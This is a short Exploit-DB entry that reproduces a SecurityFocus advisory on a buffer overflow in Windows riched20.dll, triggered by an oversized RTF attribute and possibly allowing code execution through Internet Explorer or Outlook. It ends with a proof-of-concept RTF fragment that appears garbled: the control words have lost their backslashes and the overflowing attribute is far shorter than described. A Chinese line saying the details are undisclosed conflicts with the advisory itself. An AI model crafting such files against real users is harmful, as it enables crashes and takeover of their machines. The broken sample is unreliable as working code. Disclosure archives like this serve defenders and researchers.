https://www.exploit-db.com/exploits/22255

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/6874/info

The riched20.dll is vulnerable to a buffer overflow that results in the application calling the library to fail. By creating a Rich Text Format (RTF) file with more than 65536 bytes of data in an attribute, the buffer will be overrun.

Execution of arbitrary code may be possible.

RTF files may be opened automatically by Internet Explorer and Outlook.

** Some reports indicate that this vulnerability could not be reproduced on riched20.dll v.3.0 (5.30.23.1200) running on Windows NT or riched20.dll v.3.0 (5.30.23.1211) running on Windows XP. 

{rtf1ansiansicpg936deff0deflang1033deflangfe2052{fonttbl{f0
fnilfprq2fcharset134 'cb'ce'cc'e5;}}
{colortbl ;red255green0blue255;}
viewkind4uc1pardcf1kerning2f0
fs18121111111111111111111111111111111110000 www.yoursft.comfs20par
}